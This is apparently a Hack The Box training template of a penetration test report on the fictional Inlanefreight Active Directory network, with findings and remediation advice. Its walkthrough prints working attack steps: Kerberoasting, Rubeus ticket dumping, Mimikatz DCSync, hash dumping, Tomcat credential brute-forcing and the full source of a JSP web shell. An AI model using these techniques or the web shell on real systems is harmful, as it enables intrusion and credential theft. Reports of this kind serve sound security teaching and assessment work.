Sample Penetration Testing Report Template
Sample Penetration Testing Report Template
Sample Penetration Testing Report Template
Report of Findings
Inlanefreight Ltd.
June 2, 2022
Version 1.0
Statement of Confidentiality
The contents of this document have been developed by Hack The Box. Hack The Box considers the contents of this
document to be proprietary and business confidential information. This information is to be used only in the performance
of its intended use. This document may not be released to another vendor, business partner or contractor without prior
written consent from Hack The Box. Additionally, no portion of this document may be communicated, reproduced,
copied or distributed without the prior consent of Hack The Box.
The contents of this document do not constitute legal advice. Hack The Box’s offer of services that relate to compliance,
litigation or other legal interests are not intended as legal counsel and should not be taken as such. The assessment
detailed herein is against a fictional company for training and examination purposes, and the vulnerabilities in no way
affect Hack The Box external or internal infrastructure.
Engagement Contacts
Inlanefreight Contacts
Assessor Contact
Executive Summary
Inlanefreight Ltd. (“Inlanefreight” herein) contracted Hack The Box Academy to perform a Network Penetration Test of
Inlanefreight’s internally facing network to identify security weaknesses, determine the impact to Inlanefreight,
document all findings in a clear and repeatable manner, and provide remediation recommendations.
Hack The Box Academy performed testing under a “black box” approach May 12, 2022, to May 31, 2022 without
credentials or any advance knowledge of Inlanefreight’s internally facing environment with the goal of identifying
unknown weaknesses. Testing was performed from a non-evasive standpoint with the goal of uncovering as many
misconfigurations and vulnerabilities as possible. Testing was performed remotely via a host that was provisioned
specifically for this assessment. Each weakness identified was documented and manually investigated to determine
exploitation possibilities and escalation potential. Hack The Box Academy sought to demonstrate the full impact of every
vulnerability, up to and including internal domain compromise. If Hack The Box Academy were able to gain a foothold in
the internal network, Inlanefreight allowed for further testing including lateral movement and horizontal/vertical
privilege escalation to demonstrate the impact of an internal network compromise.
The scope of this assessment was one internal network range and the INLANEFREIGHT.LOCAL Active Directory domain.
In-Scope Assets
The tester found Inlanefreight’s patch and vulnerability management to be well-maintained. None of the findings in this
report were related to missing operating system or third-party patches of known vulnerabilities in services and
applications that could result in unauthorized access and system compromise. Each flaw discovered during testing was
related to a misconfiguration or lack of hardening, with most falling under the categories of weak authentication and
weak authorization.
One finding involved a network communication protocol that can be “spoofed” to retrieve passwords for internal users
that can be used to gain unauthorized access if an attacker can gain unauthorized access to the network without
credentials. In most corporate environments, this protocol is unnecessary and can be disabled. It is enabled by default
primarily for small and medium sized businesses that do not have the resources for a dedicated hostname resolution (the
“phonebook” of your network) server. During the assessment, the presence of these resources was observed on the
network, so Inlanefreight should begin formulating a test plan to disable the dangerous service.
The next issue was a weak configuration involving service accounts that allows any authenticated user to steal a
component of the authentication process that can often be guessed offline (via password “cracking”) to reveal the
human-readable form of the account’s password. These types of service accounts typically have more privileges than a
standard user, so obtaining one of their passwords in clear text could result in lateral movement or privilege escalation
and eventually in complete internal network compromise. The tester also noticed that the same password was used for
administrator access to all servers within the internal network. This means that if one server is compromised, an attacker
can re-use this password to access any server that shares it for administrative access. Fortunately, both issues can be
corrected without the need for third-party tools. Microsoft’s Active Directory contains settings that can be used to
minimize the risk of these resources being abused for the benefit of malicious users.
A webserver was also found to be running a web application that used weak and easily guessable credentials to access an
administrative console that can be leveraged to gain unauthorized access to the underlying server. This could be
exploited by an attacker on the internal network without needing a valid user account. This attack is very well-
documented, so it is an exceedingly likely target can be particularly damaging, even in the hands of an unskilled attacker.
Ideally, direct external access to this service would be disabled, but if it cannot be, it should be reconfigured with
exceptionally strong credentials that are rotated frequently. Inlanefreight may also want to consider maximizing the log
data collected from this device to ensure that attacks against it can be detected and triaged quickly.
The tester also found shared folders with excessive permissions, meaning that all users in the internal network can access
a considerable amount of data. While sharing files internally between departments and users is important to day-to-day
business operations, wide open permissions on file shares may result in unintentional disclosure of confidential
information. Even if a file share does not contain any sensitive information today, someone may unwittingly put such
data there thinking it is protected when it isn’t. This configuration should be changed to ensure that users can access only
what is necessary to perform their day-to-day duties.
Finally, the tester noticed that testing activities seemed to go mostly unnoticed, which may represent an opportunity to
improve visibility into the internal network and indicates that a real-world attacker might remain undetected if internal
access is achieved. Inlanefreight should create a remediation plan based on the Remediation Summary section of this
report, addressing all high findings as soon as possible according to the needs of the business. Inlanefreight should also
consider performing periodic vulnerability assessments if they are not already being performed. Once the issues
identified in this report have been addressed, a more collaborative, in-depth Active Directory security assessment may
help identify additional opportunities to harden the Active Directory environment, making it more difficult for attackers
to move around the network and increasing the likelihood that Inlanefreight will be able to detect and respond to
suspicious activity.
Network Penetration Test Assessment Summary
Hack The Box Academy began all testing activities from the perspective of an unauthenticated user on the internal
network. Inlanefreight provided the tester with network ranges but did not provide additional information such as
operating system or configuration information.
Summary of Findings
During the course of testing, Hack The Box Academy uncovered a total of seven (7) findings that pose a material risk to
Inlanefreight’s information systems. Hack The Box Academy also identified one informational finding that, if addressed,
could further strengthen Inlanefreight’s overall security posture. Informational findings are observations for areas of
improvement by the organization and do not represent security vulnerabilities on their own. The below table provides a
summary of the findings by severity level.
Finding Severity
5 1 1 7
Table 2: Severity Summary
Below is a high-level overview of each finding identified during testing. These findings are covered in depth in the
Technical Findings Details section of this report.
Internal Network Compromise Walkthrough
During the course of the assessment Hack The Box Academy was able gain a foothold and compromise the internal
network, leading to full administrative control over the INLANEFREIGHT.LOCAL Active Directory domain. The steps
below demonstrate the steps taken from initial access to compromise and does not include all vulnerabilities and
misconfigurations discovered during the course of testing. Any issues not used as part of the path to compromise are
listed as separate, standalone issues in the Technical Findings Details section, ranked by severity level. The intent of this
attack chain is to demonstrate to Inlanefreight the impact of each vulnerability shown in this report and how they fit
together to demonstrate the overall risk to the client environment and help to prioritize remediation efforts (i.e., patching
two flaws quickly could break up the attack chain while the company works to remediate all issues reported). While other
findings shown in this report could be leveraged to gain a similar level of access, this attack chain shows the initial path
of least resistance taken by the tester to achieve domain compromise.
Detailed Walkthrough
Hack The Box Academy performed the following to fully compromise the INLANEFREIGHT.LOCAL domain.
1. The tester utilized the Responder tool to obtain an NTLMv2 password hash for a domain user, bsmith.
2. This password hash was successfully cracked offline using the Hashcat tool to reveal the user's clear text
password which granted a foothold into the INLANEFREIGHT.LOCAL domain, but with no more privileges than
a standard domain user.
3. The tester then ran the, a Python version of the popular SharpHound collection tool to
enumerate the domain and create visual representations of attack paths. Upon review, the tester found that
multiple privileged users existed in the domain configured with Service Principal Names (SPNs), which can be
leveraged to perform a Kerberoasting attack and retrieve TGS Kerberos tickets for the accounts which can be
cracked offline using Hashcat if a weak password is set. From here, the tester used the tool to
carry out a targeted Kerberoasting attack against the mssqlsvc account, having found that the mssqlsvc account
had local administrator rights over the host SQL01.INLANEFREIGHT.LOCAL which was an interesting target in
the domain.
4. The tester was able to successfully crack this account's password offline, revealing the clear text value.
5. The tester was able to authenticate to the host SQL01.INLANEFREIGHT.LOCAL and retrieve a clear text
password from the host's registry by decrypting LSA secrets for an account (srvadmin) which was set up for
6. This srvadmin account had local administrator rights over all servers (aside from Domain Controllers) in the
domain so the tester was able to log into the MS01.INLANEFREIGHT.LOCAL host and retrieve a Kerberos TGT
ticket for a logged in user, pramirez, who was part of the Tier I Server Admins group which granted the account
DCSync rights over the domain object. This attack can be utilized to retrieve the NTLM password hash for any
user in the domain, resulting in domain compromise and persistence via a Golden Ticket.
7. The tester used the Rubeus tool to extract the Kerberos TGT ticket for the pramirez user and perform a Pass-the-
Ticket attack to authenticate as this user.
8. Finally, the tester was able to perform a DCSync attack after successfully authenticating with this user account
via the Mimikatz tool which ended in domain compromise.
Detailed reproduction steps for this attack chain are as follows:
Upon connecting to the network, the tester started the Responder tool and was able to capture a password hash for
the bsmith user by spoofing NBT-NS/LLMNR traffic on the local network segment.
The tester was able to "crack" this password hash offline using the Hashcat tool and retrieve the clear text password
value, thus granting a foothold to enumerate the Active Directory domain.
The tester proceeded to enumerate user accounts configured with Service Principal Names (SPNs) that may be subject
to a Kerberoasting attack, a lateral movement/privilege escalation technique that targets SPNs which are unique
identifiers that Kerberos uses to map a service instance to a service account. Any domain user can request a Kerberos
ticket for any service account in the domain and the ticket is encrypted with the service account's NTLM password hash,
which can potentially be "cracked" offline to reveal the account's clear text password value.
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
------------------------------------------- --------- -------- -------------------------- --------- ----
MSSQLSvc/SQL01.inlanefreight.local:1433 mssqlsvc 2022-05-13 16:52:07.280623 <never>
MSSQLSvc/SQL02.inlanefreight.local:1433 sqlprod 2022-05-13 16:54:52.889815 <never>
MSSQLSvc/SQL-DEV01.inlanefreight.local:1433 sqldev 2022-05-13 16:54:57.905315 <never>
MSSQLSvc/QA001.inlanefreight.local:1433 sqlqa 2022-05-13 16:55:03.421004 <never>
backupjob/veam001.inlanefreight.local backupjob 2022-05-13 18:38:17.740269 <never>
vmware/vc.inlanefreight.local vmwaresvc 2022-05-13 18:39:10.691799 <never>
Figure 3: Listing SPN Accounts with
The tester then ran the Python version of the popular BloodHound Active Directory enumeration tool to collect
information such as users, groups, computers, ACLs, group membership, user and computer properties, user sessions,
local admin access, and more. This data can then be imported into a GUI tool to create visual representations of
relationships within the domain and map out "attack paths" that can be used to potentially move laterally or escalate
privileges within a domain.
The tester used this tool to check privileges for each of the SPN accounts enumerated earlier and noticed that only
the mssqlsvc account had any privileges beyond a standard domain user. This account had local administrator access
over the SQL01 host. SQL servers are often high value targets in a domain as they hold privileged credentials, sensitive
data, or may even have a more privileged user logged in.
The tester then performed a targeted Kerberoasting attack to retrieve the Kerberos TGS ticket for the mssqlsvc service
$ INLANEFREIGHT.LOCAL/bsmith -dc-ip -request-user mssqlsvc
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
--------------------------------------- -------- -------- -------------------------- --------- ---------
MSSQLSvc/SQL01.inlanefreight.local:1433 mssqlsvc 2022-05-13 16:52:07.280623 <never>
Figure 6: Kerberoasting with
The tester was able to successfully "crack" this password offline to reveal its clear text value.
This password could be used to access the SQL01 host remotely and retrieve a set of clear text credentials from the
registry for the srvadmin account.
Using these credentials, the tester logged into the SQL01 host over Remote Desktop (RDP) and noted that another
user, pramirez, was currently logged in as well.
The tester checked the BloodHound tool and noticed that this user had the ability to perform the DCSync attack, which
is a technique for stealing the Active Directory password database by leveraging a protocol used by domain controllers
to replicate domain data. This attack can be used to retrieve NTLM password hashes for any user in the domain.
Figure 10: Confirming DCSync Privileges
After connecting, the tester used the Rubeus tool to view all Kerberos tickets currently available on the system and
noticed that tickets for the pramirez user were present.
| LUID | UserName | Service | EndTime
| 0x256aef | srvadmin @ INLANEFREIGHT.LOCAL | krbtgt/INLANEFREIGHT.LOCAL | 5/14/2022
6:24:19 PM |
6:24:19 PM |
| 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | krbtgt/INLANEFREIGHT.LOCAL | 5/14/2022
6:21:35 PM |
| 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | ProtectedStorage/DC01.INLANEFREIGHT.LOCAL | 5/14/2022
6:21:35 PM |
| 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | cifs/DC01.INLANEFREIGHT.LOCAL | 5/14/2022
6:21:35 PM |
| 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | cifs/DC01 | 5/14/2022
6:21:35 PM |
6:21:35 PM |
| 0x1a8ade | pramirez @ INLANEFREIGHT.LOCAL | krbtgt/INLANEFREIGHT.LOCAL | 5/14/2022
6:21:35 PM |
6:21:35 PM
The tester then used this tool to retrieve the Kerberos TGT ticket for this user which could then be used to perform a
"pass-the-ticket" attack and use the stolen TGT ticket to access resources in the domain.
PS C:\> .\Rubeus.exe dump /luid:0x1a8b19 /service:krbtgt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
ServiceName : krbtgt/INLANEFREIGHT.LOCAL
UserName : pramirez
StartTime : 5/15/2022 3:51:35 AM
EndTime : 5/15/2022 1:51:35 PM
RenewTill : 5/21/2022 8:21:35 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 3g/++VoJZ4ipbExARBCKK960cN+3juTKNHiQ8XpHL/k=
Base64EncodedTicket :
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
The tester performed the pass-the-ticket attack and successfully authenticated as the pramirez user.
This was confirmed using the klist command to view cached Kerberos tickets in the current session.
PS C:\htb> klist
Current LogonId is 0:0x256d1d
The tester then utilized this access to perform a DCSync attack and retrieve the NTLM password hash for the built-in
Administrator account which led to Enterprise Admin level access over the domain.
PS C:\htb> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( )
## \ / ## >
'## v ##' Vincent LE TOUX ( )
'#####' > / ***/
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
[DC] ms-DS-ReplicationEpoch is: 1
The tester confirmed this access by authenticating to a Domain Controller in the INLANEFREIGHT.LOCAL domain.
With this access it was possible to retrieve the NTLM password hashes for all users in the domain. The tester then
performed offline cracking of these hashes using the Hashcat tool. A domain password analysis showing several metrics
can be found in the appendices of this report.
$ inlanefreight/administrator@ -hashes
ad3b435b51404eeaad3b435b51404ee:e4axxxxxxxxxxxxxxxx1c88c2e94cba2 -just-dc-ntlm
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Remediation Summary
As a result of this assessment there are several opportunities for Inlanefreight to strengthen its internal network security.
Remediation efforts are prioritized below starting with those that will likely take the least amount of time and effort to
complete. Inlanefreight should ensure that all remediation steps and mitigating controls are carefully planned and tested
to prevent any service disruptions or loss of data.
Short Term
[Finding 2] – Set strong (24+ character) passwords on all SPN accounts
[Finding 5] – Change the default admin credentials for the Tomcat Manager
[Finding 7] – Disable Directory Listing on the affected web server
Enforce a password change for all users because of the domain compromise
Medium Term
[Finding 1] – Disable LLMNR and NBT-NS wherever possible
[Finding 2] – Transition from SPNs to Group Managed Service Accounts (gMSA) wherever possible
[Finding 3] – Implement a solution such as the Microsoft Local Administrator Password Solution" (LAPS)
[Finding 4] – Enhance the domain password policy
[Finding 4] – Consider implementing an enterprise password manager
[Finding 5] – Consider limiting access to the Tomcat Manager to localhost or specific IP Addresses
[Finding 6] – Perform a network file share audit
[Finding 8] – Enhance network logging and monitoring
[Finding 8] – Implement an enterprise endpoint detection & response solution
Long Term
Perform ongoing internal network vulnerability assessments and domain password audits
Perform periodic Active Directory security assessments
Educate systems and network administrators and developers on security hardening best practices compromise
Enhance network segmentation to isolate critical hosts and limit the effects of an internal compromise
Technical Findings Details
1. LLMNR/NBT-NS Response Spoofing - High
Adversaries can spoof an authoritative source for name resolution on a victim network by
responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the
requested host, effectively poisoning the service so that the victims will communicate with the
adversary-controlled system. If the requested host belongs to a resource that requires
identification/authentication, the username and NTLMv2 hash will then be sent to the
adversary-controlled system. The adversary can then collect the hash information sent over
the wire through tools that monitor the ports for traffic or through Network Sniffing and crack
Security Impact the hashes offline through Brute Force to obtain the plaintext passwords. In some cases where
an adversary has access to a system that is in the authentication path between systems or
when automated scans that use credentials attempt to authenticate to an adversary-
controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute
code against a target system relay step can happen in conjunction with poisoning but may also
be independent of it.
Several tools exist that can be used to poison name services within local networks such as
NBNSpoof, Metasploit, and Responder.
Disable LLMNR and NetBIOS in local computer security settings or by group policy if
they are not needed within an environment
Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB
Signing can stop NTLMv2 relay attacks.
Remediation Network intrusion detection and prevention systems that can identify traffic patterns
indicative of MiTM activity can be used to mitigate activity at the network level.
Network segmentation can be used to isolate infrastructure components that do not
require broad network access. This may mitigate, or at least alleviate, the scope of
MiTM activity.
Finding Evidence:
Running the Responder tool to attempt to obtain user account password hashes.
Successfully cracking a password hash with Hashcat to reveal the clear text password value.
2. Weak Kerberos Authentication (“Kerberoasting”) - High
In an Active Directory (AD) environment, Service Principal Names (SPNs) are used to uniquely
identify instances of a Windows service. Kerberos authentication requires that each SPN be
associated with one service account (Active Directory user account). Any authenticated AD
user can request one or more Kerberos Ticket-Granting Service (TGS) tickets from the domain
Description (Incl. Root
controller for any SPN accounts. These tickets are encrypted with the associated AD account’s
NTLM password hash. They can be brute forced offline using a password cracking tool such as
Hashcat if a weak password is used along with the RC4 encryption algorithm. If AES encryption
is in use, it will take more resources to “crack” a ticket to reveal the account’s clear-text
password, but it is possible if weak passwords are in use.
A successful Kerberoasting attack along with cracked passwords could lead to lateral
movement and privilege escalation in an AD environment. If a password is cracked for a
Security Impact
Domain Administrator account or equivalent, an attacker could gain control over most, if not
all, resources in the domain.
Where possible eliminate SPNs in the environment in favor of Group Managed Service
Accounts (gMSA) which are not subject to this type of attack. If migration to gMSAs is not
possible the following steps will help mitigate the risk of this attack:
Remediation Enable AES Kerberos encryption instead of RC4
Use strong 25+ character passwords for service accounts and rotate them periodically
Limit the privileges of service accounts and avoid creating SPNs tied to highly
privileged accounts such as Domain Administrators
Finding Evidence:
Retrieving a listing all SPN accounts in the INLANEFREIGHT.LOCAL domain using the tool from the
Impacket toolkit.
Targeted Kerberoasting against the mssqlsvc account using the tool.
3. Local Administrator Password Re-Use - High
Description (Incl. Root All Windows servers in the domain were found to be using the same password for the built-in
Cause) local Administrator account.
If an attacker can compromise one host in the domain and retrieve the NTLM password hash
for the built-in local Administrator account they could use this to access all hosts in the domain
Security Impact
using this same account, potentially leading to domain compromise or significant sensitive
data disclosure.
Modify local administrator passwords on all affected hosts to be unique values. Consider a
solution such as the Microsoft Local Administrator Password Solution (LAPS) to manage local
Remediation administrator passwords centrally in Active Directory. This tool mitigates the risk of password
re-use by assigning a different machine-generated randomized password to each host that
changes automatically on a set interval.
External References
Finding Evidence:
Using the CrackMapExec tool to test for local administrator password re-use. The command below ensures that only one
logon attempt is made per host to avoid account lockout.
4. Weak Active Directory Passwords - High
The tester found that users were using common, weak, passwords within the Active Directory
Description (Incl. Root domain and was able to uncover passwords for several users via a password spraying attack.
Cause) Furthermore, an analysis of all domain passwords after achieving domain compromise showed
more widespread weak password usage.
An attacker may be able to use this to guess passwords and gain a foothold within the internal
environment. If external services are set up with Active Directory authentication (such as VPN,
Security Impact
email, or remote application services) an attacker may be able to perform a targeted password
spray to gain internal network access from an anonymous position on the internet.
Affected Domain See Appendix E – INLANEFREIGHT.LOCAL Domain Password Review for a detailed domain
password analysis.
Review the password policy and enforce a 12-character minimum password. Consider
implementing an enterprise password manager to encourage the use of strong, randomized,
Remediation passwords. Implement a password filter to restrict the use of common words such as variations
on the words “welcome” and “password”, seasons, months, and variations on the company
Finding Evidence:
Performing a password spraying attack against all domain users with the Kerbrute tool and finding two valid passwords.
5. Tomcat Manager Weak/Default Credentials - High
Description (Incl. Root An Apache Tomcat Server was found that was exposing the Tomcat Manager login URL and
Cause) using weak/default credentials to enter the Manager (admin) backend.
An attacker who gains access to the Tomcat Manager area can upload a malicious application
via a WAR file containing custom JSP code. This code can be used to run arbitrary commands
on the underlying server in the context of the service account that the Apache Tomcat instance
Security Impact runs under. This Tomcat instance was running under a local service account assigned privileges
that can be leveraged to escalate to the all-powerful NT AUTHORITY\SYSTEM account and
gain complete control over the server, potentially gaining access to credentials and other
sensitive data.
Restrict access to the Tomcat Manager URL to either localhost or only select IP
addresses if this URL does need to be accessed remotely by administrators.
Change the default administrator account name to something unique and set a strong,
randomized password that does not appear in any wordlists as the Tomcat
Manager page uses Basic Authentication, which has no inherent protections against
password brute-forcing attacks.
Finding Evidence:
Setting up the Metasploit auxiliary scanner to brute-force Tomcat manager usernames and passwords.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
The tester then ran the Metasploit module to attempt to brute force the Tomcat Manager login credentials and was
successful, retrieving the password for the QCC user.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] - LOGIN FAILED: admin:admin (Incorrect)
[-] - LOGIN FAILED: admin:manager (Incorrect)
[-] - LOGIN FAILED: admin:role1 (Incorrect)
[-] - LOGIN FAILED: admin:root (Incorrect)
[-] - LOGIN FAILED: admin:tomcat (Incorrect)
[-] - LOGIN FAILED: role1:admin (Incorrect)
[-] - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] - LOGIN FAILED: xampp:xampp (Incorrect)
[-] - LOGIN FAILED: tomcat:s3cret (Incorrect)
[+] - Login Successful: QCC:<REDACTED>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The tester then prepared a JSP web shell to upload to the Tomcat server to achieve remote code execution.
$ cat cmd.jsp
<%@ page import="java.util.*,*"%>
// cmd.jsp = Command Execution (unix)
// by: Unknown
// modified: 27/06/2003
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
disr = dis.readLine();
Figure 27: Contents of JSP Web Shell
The web shell was compressed into a WAR archive file which can be deployed as an application via the Tomcat Web
Application Manager.
$ jar -cvf deploymenttest.war cmd.jsp
added manifest
adding: cmd.jsp(in = 829) (out= 422)(deflated 49%)
Figure 28: Creating a WAR File
The tester next logged in to the Tomcat Web Application Manager accessible at the URL
Figure 29: Logged in to Tomcat Manager
Next, the tester uploaded the WAR file created earlier and deployed it as an application via the Tomcat Web Application
With this web shell in place, the tester was able to run commands on the underlying server.
Figure 32: Running ipconfig Command
From here it would be possible to leverage user account privileges to escalate to the powerful NT AUTHORITY\SYSTEM
account and begin to enumerate the Active Directory domain.
6. Insecure File Shares - Medium
An attacker who gains a foothold in this domain can use this access to search for files
Security Impact containing sensitive data such as credentials and potentially write malicious files to the file
Review file share privileges to ensure that users are granted access in accordance with the
principal of least privilege.
Finding Evidence:
Viewing file shares accessible to a standard Domain user with the CrackMapExec tool.
7. Directory Listing Enabled - Low
The severity of this finding depends on the sensitivity of the files exposed on the web server. If
the directory exposes only files intended for public consumption, then the risk is lower but if
Security Impact
an attacker can gain access to sensitive information such as configuration files, they may be
able to use these to gain further access to the application or web server.
Restrict access to files and directories based on the concept of least privilege. Enforce
authentication wherever possible and disable directory listing in the web server configuration.
External References
Finding Evidence:
Using a web browser, browsing to the affected host lists the directory contents.
8. Enhance Security Monitoring Capabilities - Info
Description (Incl. Root It appeared that Inlanefreight did not notice “noisy” activities during the course of testing. The
Cause) tester was also not blocked when using standard open-source penetration testing tools.
If network and endpoint detection and response are inadequate, an attacker who can gain a
Security Impact foothold in the internal network may be able to move laterally, perform post-exploitation, and
achieve persistence easily.
Consider investing in a more advanced network monitoring solution, configuring logging on all
hosts, and processing them for anomalies using a SIEM tool, and implementing endpoint
detection on each server and workstation that is more difficult to bypass and tamper with. The
Remediation organization should not rely on endpoint protection alone. When combined with a defense-in-
depth security strategy, they can be an excellent tool for detecting an attacker who gains
internal network access and is forced to perform “noisier” and riskier activities to the nature of
the hardened environment.
Appendix A – Finding Severities
Each finding has been assigned a severity rating of high, medium, or low. The rating is based off of an assessment of the
priority with which each finding should be viewed and the potential impact each has on the confidentiality, integrity, and
availability of Inlanefreight’s data.
Exploitation of the technical or procedural vulnerability will cause substantial harm. Significant political,
financial, and/or legal damage is likely to result. The threat exposure is high, thereby increasing the likelihood of
occurrence. Security controls are not effectively implemented to reduce the severity of impact if the vulnerability
were exploited.
Exploitation of the technical or procedural vulnerability will significantly impact the confidentiality, integrity,
and/or availability of the system, application, or data. Exploitation of the vulnerability may cause moderate
financial loss or public embarrassment. The threat exposure is moderate-to-high, thereby increasing the
likelihood of occurrence. Security controls are in place to contain the severity of impact if the vulnerability were
Medium exploited, such that further political, financial, or legal damage will not occur.
- OR -
The vulnerability is such that it would otherwise be considered High Risk, but the threat exposure is so limited
that the likelihood of occurrence is minimal.
Exploitation of the technical or procedural vulnerability will cause minimal impact to operations. The
Confidentiality, Integrity and Availability (CIA) of sensitive information are not at risk of compromise.
Exploitation of the vulnerability may cause slight financial loss or public embarrassment. The threat exposure is
moderate-to-low. Security controls are in place to contain the severity of impact if the vulnerability were
Low exploited, such that further political, financial, or legal damage will not occur.
- OR -
The vulnerability is such that it would otherwise be considered Medium Risk, but the threat exposure is so limited
that the likelihood of occurrence is minimal.
Table 4: Severity Definitions
Appendix B – Exploited Hosts
Host Scope Method Notes (MS01) Internal Tomcat Manger Weak/Default Credentials Alternate domain foothold
Internal NBT-NS/LLMNR Response Spoofing/Kerberoasting Initial foothold
Table 5: Exploitation Attempt Details
Appendix C – Compromised Users
Username Type Method Notes
pramirez Domain Credential Theft (Kerberos TGT Ticket) Sysadmin with DCSync rights
Table 6: User Accounts Compromised
Appendix D – Changes/Host Cleanup
Host Scope Change/Cleanup needed
Appendix E – INLANEFREIGHT.LOCAL Domain Password Review
Password Statistics
Metric #
Metric #
Welcome1 22
Password123 10
Inlanefreight! 8
Spring2022 2
Table 9: Password Reuse Statistics
Length #
22 1
15 3
14 13
13 10
12 8
11 27
10 38
9 220
8 897
Length #
7 67
Table 10: Password Length Statistics